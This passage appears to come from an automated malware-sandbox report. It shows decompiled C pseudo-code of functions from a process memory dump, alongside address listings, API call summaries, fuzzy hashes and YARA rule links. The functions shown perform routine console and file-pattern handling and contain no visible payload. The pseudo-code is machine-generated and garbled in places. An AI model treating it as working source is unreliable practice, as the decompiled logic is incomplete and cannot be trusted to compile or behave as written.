																	if(_t130 != 0) {
																		continue;
																	} else {
																		break;
																	}
																}
															}
														}
														goto L102;
													}
													_t175 = _v1108;
													goto L34;
												}
											} else {
												_t169 = _t130;
												if(E011DDD2C(_t189, _t130, 1) != 0) {
													goto L87;
												} else {
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L102:
			}































































                                                    0x011e07c5
                                                    0x011e07c7
                                                    0x011e07cc
                                                    0x011e07d7
                                                    0x011e07d8
                                                    0x011e07de
                                                    0x011e07e3
                                                    0x011e07e6
                                                    0x011e07e8
                                                    0x011e07eb
                                                    0x011e07ee
                                                    0x011e07f2
                                                    0x011e07f8
                                                    0x011e07fa
                                                    0x011e0800
                                                    0x011e0816
                                                    0x011e0820
                                                    0x011ecc7e
                                                    0x011ecc7e
                                                    0x00000000
                                                    0x011e0826
                                                    0x011e082c
                                                    0x011e0838
                                                    0x011ecc3d
                                                    0x011e083e
                                                    0x011e083e
                                                    0x011e083e
                                                    0x011e0851
                                                    0x011ecc73
                                                    0x011ecc79
                                                    0x00000000
                                                    0x011e0857
                                                    0x011e0857
                                                    0x011e085f
                                                    0x011e0b1a
                                                    0x011e0b24
                                                    0x011ecc47
                                                    0x011ecc49
                                                    0x00000000
                                                    0x011e0b2a
                                                    0x011e0b2d
                                                    0x011e0b37
                                                    0x011ecc4d
                                                    0x011ecc55
                                                    0x011ecc56
                                                    0x011ecc56
                                                    0x00000000
                                                    0x011e0b3d
                                                    0x011e0b51
                                                    0x011e0b54
                                                    0x011e0b57
                                                    0x011e0b57
                                                    0x011e0b60
                                                    0x011e0b60
                                                    0x011e0b63
                                                    0x011e0b66
                                                    0x011e0b72
                                                    0x011ecc8a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0b72
                                                    0x011e0b37
                                                    0x00000000
                                                    0x011e0865
                                                    0x011e0865
                                                    0x011e0872
                                                    0x011e0874
                                                    0x011e087d
                                                    0x011e0b78
                                                    0x011e0b7f
                                                    0x00000000
                                                    0x011e0883
                                                    0x011e0886
                                                    0x00000000
                                                    0x011e088c
                                                    0x011e088f
                                                    0x011e0896
                                                    0x011e089e
                                                    0x011ecc8f
                                                    0x011ecc95
                                                    0x011ecc9a
                                                    0x00000000
                                                    0x011e08a4
                                                    0x011e08a4
                                                    0x011e08ac
                                                    0x011ecca1
                                                    0x011ecca1
                                                    0x011e08b7
                                                    0x011e08ba
                                                    0x011e08c2
                                                    0x011eccac
                                                    0x011eccac
                                                    0x011e08ca
                                                    0x011e08d6
                                                    0x011eccb7
                                                    0x011eccb7
                                                    0x011e08e6
                                                    0x011e08eb
                                                    0x011e0a68
                                                    0x00000000
                                                    0x011e0a6e
                                                    0x011e0a76
                                                    0x011e0a7c
                                                    0x011e0a81
                                                    0x00000000
                                                    0x011e0a87
                                                    0x00000000
                                                    0x011e0a87
                                                    0x011e0a81
                                                    0x011e08f1
                                                    0x011e08f1
                                                    0x011e08f4
                                                    0x011e0909
                                                    0x011e090b
                                                    0x011e09d1
                                                    0x011e09da
                                                    0x011e09de
                                                    0x011e09de
                                                    0x011e09e3
                                                    0x011e09ea
                                                    0x011e09f0
                                                    0x011e09f7
                                                    0x011e0a24
                                                    0x011e09f9
                                                    0x011e09ff
                                                    0x011e0aef
                                                    0x011e0a05
                                                    0x011e0a0b
                                                    0x011e0af9
                                                    0x011e0a11
                                                    0x011e0a17
                                                    0x011e0b09
                                                    0x011e0b86
                                                    0x011e0b0b
                                                    0x011e0b0d
                                                    0x011e0b13
                                                    0x011e0b13
                                                    0x011e0a1d
                                                    0x011e0a1d
                                                    0x011e0a1d
                                                    0x011e0a17
                                                    0x011e0a0b
                                                    0x011e09ff
                                                    0x011e0a29
                                                    0x011e0a2b
                                                    0x011e0a31
                                                    0x011e0a38
                                                    0x011e0a3d
                                                    0x011e0a43
                                                    0x011e0a48
                                                    0x011e0a4a
                                                    0x011e0a4d
                                                    0x011e0a55
                                                    0x011e0a56
                                                    0x011e0a57
                                                    0x011e0a65
                                                    0x011e0911
                                                    0x011e0911
                                                    0x011e0920
                                                    0x011e0920
                                                    0x011e0923
                                                    0x011e0926
                                                    0x011e092d
                                                    0x011e0932
                                                    0x011e0938
                                                    0x011e093d
                                                    0x011e0a98
                                                    0x011e0a98
                                                    0x011e0a9a
                                                    0x011e0a9c
                                                    0x011e0a9c
                                                    0x011e0aa0
                                                    0x011e0aa0
                                                    0x011e0aa3
                                                    0x011e0aa6
                                                    0x011e0aad
                                                    0x011e0aaf
                                                    0x011e0ab1
                                                    0x011e0ab5
                                                    0x011e0ab7
                                                    0x011e0ab7
                                                    0x011e0abe
                                                    0x011e0ac0
                                                    0x011e0ac8
                                                    0x011e0ac8
                                                    0x011e0ac9
                                                    0x011e0aca
                                                    0x011e0ab7
                                                    0x011e0ace
                                                    0x011e0ad6
                                                    0x011e0bf7
                                                    0x011e0bfe
                                                    0x011e0c09
                                                    0x011e0c0e
                                                    0x011e0c26
                                                    0x011e0c2a
                                                    0x011ecd24
                                                    0x011ecd25
                                                    0x011ecd2a
                                                    0x00000000
                                                    0x011e0c30
                                                    0x011e0c30
                                                    0x011e0c38
                                                    0x011e0c5d
                                                    0x011e0c5d
                                                    0x011e0c4b
                                                    0x011e0c4f
                                                    0x011ecd2e
                                                    0x011ecd2f
                                                    0x011ecd34
                                                    0x011ecd36
                                                    0x011ecd3a
                                                    0x011ecd3a
                                                    0x011e0c4f
                                                    0x011e0c5a
                                                    0x011e0adc
                                                    0x011e0ade
                                                    0x011e0ae5
                                                    0x00000000
                                                    0x011e0ae5
                                                    0x011e0943
                                                    0x011e0943
                                                    0x011e0945
                                                    0x011e0945
                                                    0x011e0948
                                                    0x011ecccc
                                                    0x011eccd4
                                                    0x011eccd4
                                                    0x011e095a
                                                    0x011e095a
                                                    0x011e0961
                                                    0x011e0963
                                                    0x011e0965
                                                    0x011e096c
                                                    0x011e0973
                                                    0x011e0975
                                                    0x011e0978
                                                    0x011e097b
                                                    0x011e097e
                                                    0x00000000
                                                    0x00000000
                                                    0x011e097e
                                                    0x00000000
                                                    0x011e0973
                                                    0x011e0982
                                                    0x011eccc2
                                                    0x011eccc2
                                                    0x011e0988
                                                    0x011e098a
                                                    0x011e098a
                                                    0x011e098d
                                                    0x011e0996
                                                    0x011e0b95
                                                    0x00000000
                                                    0x011e0b9b
                                                    0x011e0b9b
                                                    0x011e0ba5
                                                    0x011ecc5d
                                                    0x011ecc5f
                                                    0x00000000
                                                    0x011e0bab
                                                    0x011e0bb2
                                                    0x011e0bc4
                                                    0x011e0bc4
                                                    0x00000000
                                                    0x011e0bb4
                                                    0x011e0bb4
                                                    0x011e0bbe
                                                    0x011eccdc
                                                    0x011ecce4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0bbe
                                                    0x011e0bb2
                                                    0x011e0ba5
                                                    0x011e099c
                                                    0x011e099c
                                                    0x011e099e
                                                    0x011e0bd4
                                                    0x00000000
                                                    0x011e0bda
                                                    0x011eccea
                                                    0x011eccec
                                                    0x011ecc61
                                                    0x011ecc61
                                                    0x011ecc66
                                                    0x011ecc70
                                                    0x00000000
                                                    0x011ecc70
                                                    0x011e09a4
                                                    0x011e09a4
                                                    0x011e09a4
                                                    0x011e09a6
                                                    0x011e09a6
                                                    0x011e09b0
                                                    0x011e09b0
                                                    0x011e09b3
                                                    0x011e09b6
                                                    0x011e09c2
                                                    0x011e09c5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e09c5
                                                    0x011e099e
                                                    0x011e0996
                                                    0x00000000
                                                    0x011e093d
                                                    0x011e09cb
                                                    0x00000000
                                                    0x011e09cb
                                                    0x011e08f6
                                                    0x011e08f8
                                                    0x011e0903
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0903
                                                    0x011e08f4
                                                    0x011e08eb
                                                    0x011e089e
                                                    0x011e0886
                                                    0x011e087d
                                                    0x011e085f
                                                    0x011e0851
                                                    0x00000000

                                                    APIs
                                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,1805BC26,00000001,?), ref: 011E0816
                                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • towupper.MSVCRT ref: 011E0B44
                                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                                    • wcschr.MSVCRT ref: 011E0932
                                                    • wcsncmp.MSVCRT(00000000,011D218C,00000004,00000002,00007FE7), ref: 011E0A76
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A06
                                                      • Part of subcall function 011D6980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A10
                                                      • Part of subcall function 011D6980: _wcsnicmp.MSVCRT ref: 011D6A3D
                                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A64
                                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A6E
                                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A8E
                                                      • Part of subcall function 011D6980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6AA0
                                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 011D6AC0
                                                      • Part of subcall function 011D6980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AD1
                                                      • Part of subcall function 011D6980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,00000200,00000000,00000000), ref: 011D6AE7
                                                      • Part of subcall function 011D6980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AF4
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011ECCDE
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
                                                    • String ID:
                                                    • API String ID: 1803274588-0
                                                    • Opcode ID: 7db3bd28b2230f4c5a600131cbcbd2cf5bc0921d30300c7f7cfc2dfbedf93e7f
                                                    • Instruction ID: 0c35c30fb05bcba58be69a9150dd9c28021f8f27148d60a098fc080ed59b1ad5
                                                    • Opcode Fuzzy Hash: 7db3bd28b2230f4c5a600131cbcbd2cf5bc0921d30300c7f7cfc2dfbedf93e7f
                                                    • Instruction Fuzzy Hash: 18C10831B00A1687DB3C9FECCC9C7BE77E5AF58714F054568E90A97280EBB09991C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E4800, Relevance: 9.3, APIs: 6, Instructions: 327COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E011E4800(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				int _v28;
				char _v32;
				void* _v36;
				void _v556;
				int _v564;
				char _v568;
				void* _v572;
				void _v1092;
				char _v1093;
				signed int _v1094;
				signed int* _v1100;
				signed int _v1104;
				signed int* _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t106;
				intOrPtr _t123;
				intOrPtr _t127;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t136;
				signed int _t137;
				intOrPtr _t138;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr* _t146;
				intOrPtr _t147;
				void* _t148;
				signed int _t153;
				signed int _t154;
				void* _t163;
				intOrPtr* _t164;
				intOrPtr* _t167;
				intOrPtr* _t170;
				signed int _t176;
				signed int* _t177;
				void* _t178;
				intOrPtr* _t186;
				void* _t190;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr* _t200;
				void* _t201;
				void* _t202;
				intOrPtr _t203;
				intOrPtr* _t204;
				signed int* _t205;
				signed int _t206;
				signed int _t211;

				_t191 = __edx;
				_t154 = _t211;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t154 + 4));
				_t209 = (_t211 & 0xfffffff8) + 4;
				_t106 =  *0x11fd0b4; // 0x1805bc26
				_v16 = _t106 ^ (_t211 & 0xfffffff8) + 0x00000004;
				_t200 =  *((intOrPtr*)(_t154 + 0xc));
				_t196 = 0;
				_v564 = 0x104;
				_v1093 = __edx;
				_v1116 = __ecx;
				 *0x1213cf0 = 0;
				_v572 = 0;
				_v568 = 1;
				memset( &_v1092, 0, 0x104);
				_v36 = 0;
				_v32 = 1;
				_v28 = 0x104;
				memset( &_v556, 0, 0x104);
				_t156 =  &_v1092;
				if(E011E0C70( &_v1092, 0x7fe9) < 0) {
					L74:
					if(_v1093 == 0) {
						L14:
						_t196 = 1;
						L15:
						__imp__??_V@YAXPAX@Z(_v36);
						__imp__??_V@YAXPAX@Z(_v572);
						_pop(_t198);
						_pop(_t201);
						return E011E6FD0(_t196, _t154, _v16 ^ _t209, _t191, _t198, _t201);
					}
					_push(_t196);
					_push(0x2374);
					L13:
					E011DC5A2(_t156);
					goto L14;
				}
				_t156 =  &_v556;
				if(E011E0C70( &_v556, 0x7fe9) < 0) {
					goto L74;
				}
				_t163 = 0x30;
				_t164 = E011E00B0(_t163);
				_v1108 = _t164;
				if(_t164 == 0) {
					L47:
					E011F9287(_t164);
					__imp__longjmp(0x120b8b8, 1);
					L48:
					_t165 = 0x1213ab0;
					L17:
					E011E0D89(_t191, _t165);
					E011E5D39();
					_t202 = _v572;
					_t167 = _t202;
					if(_t202 == 0) {
						_t167 =  &_v1092;
					}
					_t191 = _t167 + 2;
					do {
						_t123 =  *_t167;
						_t167 = _t167 + 2;
					} while (_t123 != _t196);
					_t156 = _t167 - _t191 >> 1;
					_v1104 = _t156;
					if(_t156 <= 3) {
						L24:
						if(_t156 + 1 > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(2);
							goto L13;
						}
						_t203 = _v1120;
						_t125 =  *(_t203 + 0x10);
						if( *( *(_t203 + 0x10)) == _t196) {
							_t125 = "*";
						}
						E011E0D89(_t191, _t125);
						_t170 = _v36;
						if(_t170 == 0) {
							_t170 =  &_v556;
						}
						_t191 = _t170 + 2;
						do {
							_t127 =  *_t170;
							_t170 = _t170 + 2;
						} while (_t127 != _t196);
						_t156 = _t170 - _t191 >> 1;
						if(_v1104 + 1 + (_t170 - _t191 >> 1) > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(0x6f);
							goto L13;
						}
						if( *( *(_t203 + 0x10)) == _t196) {
							L33:
							_t172 = _v36;
							if(_v36 == 0) {
								_t172 =  &_v556;
							}
							_t132 = E011E297B(_t172);
							_t204 = _v1100;
							 *_t204 = _t132;
							_t173 = _v572;
							if(_v572 == 0) {
								_t173 =  &_v1092;
							}
							_t133 = E011E297B(_t173);
							 *((intOrPtr*)(_t204 + 4)) = _t133;
							_t205 = _v1108;
							if(_t205[1] != _t196) {
								__imp___wcsicmp(_t205[1], _t133);
								if(_t133 == 0) {
									_t205[2] = _t205[2] + 1;
									_t176 = _v1100;
									goto L38;
								}
								_t164 = 0x30;
								_t205 = E011E00B0(_t164);
								if(_t205 == 0) {
									goto L47;
								}
								_v1108 = _t205;
								 *_v1108 = _t205;
								_t143 = E011E297B(_v1100[1]);
								_t176 = _v1100;
								_t205[1] = _t143;
								 *_t205 = _t196;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								_t205[2] = 1;
								goto L37;
							} else {
								_t145 = E011E297B(_t133);
								_t176 = _v1100;
								_t205[1] = _t145;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								L37:
								_t205[3] = _t176;
								_t205[4] = _t144;
								L38:
								_t191 = _v1116;
								_t135 = _v1112 + 1;
								_t177 =  *(_t176 + 0xc);
								_v1112 = _t135;
								_v1100 = _t177;
								if(_t135 >  *((intOrPtr*)(_v1116 + 0x48))) {
									goto L15;
								}
								L4:
								_t206 =  *_t177;
								_t192 = _t206;
								_v1104 = _t206;
								_t178 = _t192 + 2;
								do {
									_t136 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t136 != _t196);
								_t191 = _t192 - _t178 >> 1;
								_t137 = E011E3121(_t206, _t192 - _t178 >> 1);
								_v1094 = _t137;
								if(_t137 != 0) {
									L8:
									_v1100[2] = _t137;
									if( *((char*)(_t154 + 8)) != 0) {
										_t191 = _t137;
										_t206 = E011E4DB8(_t206, _t137);
										E011E0040(_v1104);
									}
									_t156 = _t206;
									 *0x1213cf0 = _t196;
									_t138 = E011E3B5D(_t206, _t191);
									_v1120 = _t138;
									if(_t138 != 1) {
										_t165 =  *0x1213cb8;
										if( *0x1213cb8 == 0) {
											goto L48;
										}
										goto L17;
									} else {
										if(_v1093 == 0) {
											goto L14;
										}
										_push(_t196);
										_push( *0x1213cf0);
										goto L13;
									}
								}
								_t156 =  *0x1213cf0;
								if(_t156 != 0) {
									if(_v1093 == 0) {
										goto L14;
									}
									_push(_t196);
									_push(_t156);
									goto L13;
								}
								goto L8;
							}
						}
						_t146 =  *((intOrPtr*)(_t203 + 0x14));
						if(_t146 == 0 ||  *_t146 == _t196) {
							_t186 = _v36;
							if(_t186 == 0) {
								_t186 =  &_v556;
							}
							_t191 = _t186 + 2;
							do {
								_t147 =  *_t186;
								_t186 = _t186 + 2;
							} while (_t147 != _t196);
							_t148 = (_t186 - _t191 >> 1) + 3;
							if(_v1094 != 0) {
								if(_t148 <= 0x7fe7 &&  *((char*)(_t154 + 8)) != 0) {
									E011E0CF2(_t191, L".*");
								}
							}
						}
						goto L33;
					}
					if(_v1094 != 0) {
						_t190 = _t202;
						if(_t202 == 0) {
							_t190 =  &_v1092;
						}
						if( *((short*)(E011D5846(_t190))) != 0x2e) {
							_t156 = _v1104;
							goto L22;
						} else {
							if(_t202 == 0) {
								_t202 =  &_v1092;
							}
							_t156 = _v1104;
							 *((short*)(_t202 + _t156 * 2 - 4)) = 0;
							goto L24;
						}
					}
					L22:
					if(_t202 == 0) {
						_t202 =  &_v1092;
					}
					 *((short*)(_t202 + _t156 * 2 - 2)) = 0;
					goto L24;
				}
				_t153 = _v1116;
				 *_t200 = _t164;
				_t191 = 1;
				 *_t164 = 0;
				 *((intOrPtr*)(_t164 + 4)) = 0;
				 *((intOrPtr*)(_t164 + 8)) = 1;
				_t177 = _t153 + 0x4c;
				_v1112 = 1;
				_v1100 = _t177;
				if( *((intOrPtr*)(_t153 + 0x48)) < 1) {
					goto L15;
				}
				goto L4;
			}





























































                                                    0x011e4800
                                                    0x011e4803
                                                    0x011e4805
                                                    0x011e4806
                                                    0x011e4811
                                                    0x011e4815
                                                    0x011e481d
                                                    0x011e4824
                                                    0x011e4828
                                                    0x011e4832
                                                    0x011e4834
                                                    0x011e4840
                                                    0x011e4848
                                                    0x011e484e
                                                    0x011e4854
                                                    0x011e485a
                                                    0x011e4861
                                                    0x011e4869
                                                    0x011e4871
                                                    0x011e4875
                                                    0x011e4881
                                                    0x011e4889
                                                    0x011e489b
                                                    0x011eea9e
                                                    0x011eeaa5
                                                    0x011e498b
                                                    0x011e498d
                                                    0x011e498e
                                                    0x011e4991
                                                    0x011e499e
                                                    0x011e49aa
                                                    0x011e49ad
                                                    0x011e49b9
                                                    0x011e49b9
                                                    0x011eeaab
                                                    0x011eeaac
                                                    0x011e4984
                                                    0x011e4984
                                                    0x00000000
                                                    0x011e498a
                                                    0x011e48a6
                                                    0x011e48b3
                                                    0x00000000
                                                    0x00000000
                                                    0x011e48bb
                                                    0x011e48c1
                                                    0x011e48c3
                                                    0x011e48cb
                                                    0x011ee940
                                                    0x011ee940
                                                    0x011ee94c
                                                    0x011ee952
                                                    0x011ee952
                                                    0x011e49ca
                                                    0x011e49d1
                                                    0x011e49d6
                                                    0x011e49db
                                                    0x011e49e1
                                                    0x011e49e5
                                                    0x011ee95c
                                                    0x011ee95c
                                                    0x011e49eb
                                                    0x011e49ee
                                                    0x011e49ee
                                                    0x011e49f1
                                                    0x011e49f4
                                                    0x011e49fb
                                                    0x011e49fd
                                                    0x011e4a06
                                                    0x011e4a24
                                                    0x011e4a2c
                                                    0x011eea90
                                                    0x00000000
                                                    0x00000000
                                                    0x011eea96
                                                    0x011eea97
                                                    0x00000000
                                                    0x011eea97
                                                    0x011e4a32
                                                    0x011e4a38
                                                    0x011e4a3e
                                                    0x011ee9b0
                                                    0x011ee9b0
                                                    0x011e4a4b
                                                    0x011e4a50
                                                    0x011e4a55
                                                    0x011ee9ba
                                                    0x011ee9ba
                                                    0x011e4a5b
                                                    0x011e4a5e
                                                    0x011e4a5e
                                                    0x011e4a61
                                                    0x011e4a64
                                                    0x011e4a71
                                                    0x011e4a7b
                                                    0x011eea7b
                                                    0x00000000
                                                    0x00000000
                                                    0x011eea81
                                                    0x011eea82
                                                    0x00000000
                                                    0x011eea82
                                                    0x011e4a87
                                                    0x011e4a9d
                                                    0x011e4a9d
                                                    0x011e4aa2
                                                    0x011ee9ef
                                                    0x011ee9ef
                                                    0x011e4aa8
                                                    0x011e4aad
                                                    0x011e4ab3
                                                    0x011e4ab5
                                                    0x011e4abd
                                                    0x011e4b53
                                                    0x011e4b53
                                                    0x011e4ac3
                                                    0x011e4ac8
                                                    0x011e4acb
                                                    0x011e4ad4
                                                    0x011ee9fe
                                                    0x011eea08
                                                    0x011eea52
                                                    0x011eea55
                                                    0x00000000
                                                    0x011eea55
                                                    0x011eea0c
                                                    0x011eea12
                                                    0x011eea16
                                                    0x00000000
                                                    0x00000000
                                                    0x011eea28
                                                    0x011eea2e
                                                    0x011eea33
                                                    0x011eea38
                                                    0x011eea3e
                                                    0x011eea41
                                                    0x011eea43
                                                    0x011eea46
                                                    0x00000000
                                                    0x011e4ada
                                                    0x011e4adc
                                                    0x011e4ae1
                                                    0x011e4ae7
                                                    0x011e4aea
                                                    0x011e4aed
                                                    0x011e4aed
                                                    0x011e4af0
                                                    0x011e4af3
                                                    0x011e4af9
                                                    0x011e4aff
                                                    0x011e4b00
                                                    0x011e4b03
                                                    0x011e4b09
                                                    0x011e4b12
                                                    0x00000000
                                                    0x00000000
                                                    0x011e48fc
                                                    0x011e48fc
                                                    0x011e48fe
                                                    0x011e4900
                                                    0x011e4906
                                                    0x011e4909
                                                    0x011e4909
                                                    0x011e490c
                                                    0x011e490f
                                                    0x011e4918
                                                    0x011e491a
                                                    0x011e491f
                                                    0x011e4927
                                                    0x011e4937
                                                    0x011e4941
                                                    0x011e4944
                                                    0x011e4946
                                                    0x011e4955
                                                    0x011e4957
                                                    0x011e4957
                                                    0x011e495c
                                                    0x011e495e
                                                    0x011e4964
                                                    0x011e4969
                                                    0x011e4972
                                                    0x011e49bc
                                                    0x011e49c4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e4974
                                                    0x011e497b
                                                    0x00000000
                                                    0x00000000
                                                    0x011e497d
                                                    0x011e497e
                                                    0x00000000
                                                    0x011e497e
                                                    0x011e4972
                                                    0x011e4929
                                                    0x011e4931
                                                    0x011eea67
                                                    0x00000000
                                                    0x00000000
                                                    0x011eea6d
                                                    0x011eea6e
                                                    0x00000000
                                                    0x011eea6e
                                                    0x00000000
                                                    0x011e4931
                                                    0x011e4ad4
                                                    0x011e4a89
                                                    0x011e4a8e
                                                    0x011e4b1d
                                                    0x011e4b22
                                                    0x011e4b4b
                                                    0x011e4b4b
                                                    0x011e4b24
                                                    0x011e4b27
                                                    0x011e4b27
                                                    0x011e4b2a
                                                    0x011e4b2d
                                                    0x011e4b3d
                                                    0x011e4b40
                                                    0x011ee9ca
                                                    0x011ee9e5
                                                    0x011ee9e5
                                                    0x011ee9ca
                                                    0x011e4b40
                                                    0x00000000
                                                    0x011e4a8e
                                                    0x011e4a0f
                                                    0x011ee967
                                                    0x011ee96b
                                                    0x011ee96d
                                                    0x011ee96d
                                                    0x011ee97c
                                                    0x011ee99a
                                                    0x00000000
                                                    0x011ee97e
                                                    0x011ee980
                                                    0x011ee982
                                                    0x011ee982
                                                    0x011ee988
                                                    0x011ee990
                                                    0x00000000
                                                    0x011ee990
                                                    0x011ee97c
                                                    0x011e4a15
                                                    0x011e4a17
                                                    0x011ee9a5
                                                    0x011ee9a5
                                                    0x011e4a1f
                                                    0x00000000
                                                    0x011e4a1f
                                                    0x011e48d1
                                                    0x011e48d9
                                                    0x011e48db
                                                    0x011e48dc
                                                    0x011e48de
                                                    0x011e48e1
                                                    0x011e48e4
                                                    0x011e48e7
                                                    0x011e48ed
                                                    0x011e48f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • memset.MSVCRT ref: 011E4861
                                                    • memset.MSVCRT ref: 011E4881
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E4991
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E499E
                                                    • longjmp.MSVCRT(0120B8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 011EE94C
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$Heap$AllocProcesslongjmp
                                                    • String ID:
                                                    • API String ID: 2656838167-0
                                                    • Opcode ID: 5fb23863ef84f287cb4b93a009a850ece2e652e6b9bdc2f115d537b9a9d913b2
                                                    • Instruction ID: a60e01ff0d5a996e948a621ff15948cbf00e643bf52fd4290830f50435c43733
                                                    • Opcode Fuzzy Hash: 5fb23863ef84f287cb4b93a009a850ece2e652e6b9bdc2f115d537b9a9d913b2
                                                    • Instruction Fuzzy Hash: ACD10374900A158BDB3DCF98C8987A9FBF5AF84704F0840DDDA4AA7681EB706E81CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DB6CB, Relevance: 9.2, APIs: 6, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 62%
                                                    			E011DB6CB(void** __ecx, intOrPtr _a8) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				void** _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t96;
				void* _t97;
				void* _t103;
				intOrPtr _t114;
				void* _t115;
				void** _t121;
				void** _t122;
				void* _t125;
				void* _t126;
				void* _t135;
				void* _t136;
				signed short _t143;
				long _t153;
				short* _t155;
				void* _t161;
				signed int _t164;
				void* _t168;
				void _t170;
				void _t174;
				intOrPtr _t184;
				void* _t187;
				void* _t192;
				void** _t193;
				signed int _t195;
				signed int _t204;
				int _t207;
				void** _t215;
				void** _t216;
				signed int _t224;
				signed int _t228;
				void* _t229;
				void* _t232;
				void* _t238;
				void* _t240;
				intOrPtr _t248;
				signed int _t253;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t266;

				_t193 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t97 = E011E269C(_t96);
					_t260 =  *(__ecx + 0x10);
					if(_t97 == 0) {
						if(E011E27C8( *(__ecx + 8) +  *(__ecx + 8), _t260,  *(__ecx + 8) +  *(__ecx + 8),  &_v20) == 0) {
							goto L59;
						} else {
							_t179 =  *(__ecx + 8);
							_t101 =  *(__ecx + 8) + _t179;
							if(_v20 >=  *(__ecx + 8) + _t179) {
